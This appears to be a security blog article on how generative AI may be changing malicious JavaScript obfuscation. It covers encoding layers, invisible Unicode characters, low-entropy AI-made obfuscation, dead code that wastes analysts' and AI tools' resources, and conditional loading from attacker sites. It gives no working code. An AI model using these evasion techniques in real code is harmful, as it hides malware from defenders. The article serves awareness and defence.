JavaScript

Has AI changed malicious script obfuscation techniques?

Obfuscation techniques have changing since generative AI became widely available.

Code obfuscation is the practice of making computer code difficult to read and understand. Legitimate websites use it to protect their online assets and intellectual property, and cybercriminals use it to disguise their intentions and to make code written in languages that would otherwise be easy to read, like JavaScript, harder to reverse engineer. Analysts have noticed that code obfuscation techniques have started to change recently, and the suspicion is that criminals are using generative AI tools to improve their obfuscation.

Some of the standard, non-AI, techniques for obfuscating code to complicate analysis are:

  • Stripping whitespace and unnecessary characters to remove structure, like indentation.
  • Base64 encoding, which transforms binary data into strings of ASCII characters.
  • Nested layers of encoding schemes, like base64, percent-encoding, and escape sequences.
  • Random variable names that strip meaning from the code and disguise the developer’s intentions.
  • The layout and control flow of the code is reordered and complicated to make it harder to follow.
JavaScript code with whitespace and unnecessary characters removed
JavaScript code with whitespace and unnecessary characters removed

Generative AI tools like ChatGPT have proven to be very good at deobfuscating code, so analysts have added it to their arsenal of reverse engineering tools. Research has also shown that generative AI is very good at code obfuscation, and malicious developers seem to be adopted a number of new obfuscation techniques since AI became widely available.

For example, Unicode whitespace obfuscation hides malicious code using invisible characters or characters that appear similar to standard ASCII characters. The method was first published in October 2024 and started appearing in malicious code just months later. It can be done without the aid of AI, but AI might make it easier to deploy.

Using non-ASCII characters
JavaScript obfuscation using non-ASCII characters

Malicious sections of code often stand out like a sore thumb because of obfuscation, but AI obfuscation could be used to make those sections blend in more naturally. Research by Unit 42 has shown that obfuscation conducted by Large Language Models (LLMs) shows lower text entropy (looks less obviously manipulated) than obfuscation performed by non-AI tools, making AI-obfuscated code look less suspicious.

Off-the shelf, non-AI tools also obfuscate code in predictable ways, making their output relatively easy to detect as suspicious. One of the dangers of AI-driven obfuscation is that it can be used to create unique obfuscation patterns for each individual deployment.

AI tools can be trained to create organic-looking code with:

  • Variable names that seem contextually relevant but are actually meaningless.
  • String manipulation through splitting, concatenation, or encoding that appears intentional.
  • Control flow adjustments that significantly alter the code structure without affecting its logic.
  • Self-removing code which disappears after it’s used or when it is run in a virtualized environment.

AI-driven code obfuscation can also contain sections of code that are never used, but are designed to keep human analysts and AI tools occupied figuring out what they do. Analysts trying to deobfuscate these scripts with free AI tools could find themselves running out of resources before they have completed their work.

JavaScript code with a large section of code that is never used
JavaScript code with a large section of code that is never used

Other techniques that are designed to make detection harder are likely to be made easier by AI too. Conditional execution techniques are only triggered when a user meets a specific set of conditions, such as having a particular user-agent string. When those conditions are met, code is loaded from a third-party website under the attacker’s control, or from Cloud storage like OneDrive or Google Docs.

This tactic is only used by sophisticated groups and requires that the script loading the external file looks legitimate—a perfect use case for AI’s ability to generate malicious code that blends in.

For now, the extent to which AI is being used in obfuscation is hidden from us, but few doubt that it’s going on, or that the AI arms-race between obfuscators and deobfuscators is just getting started.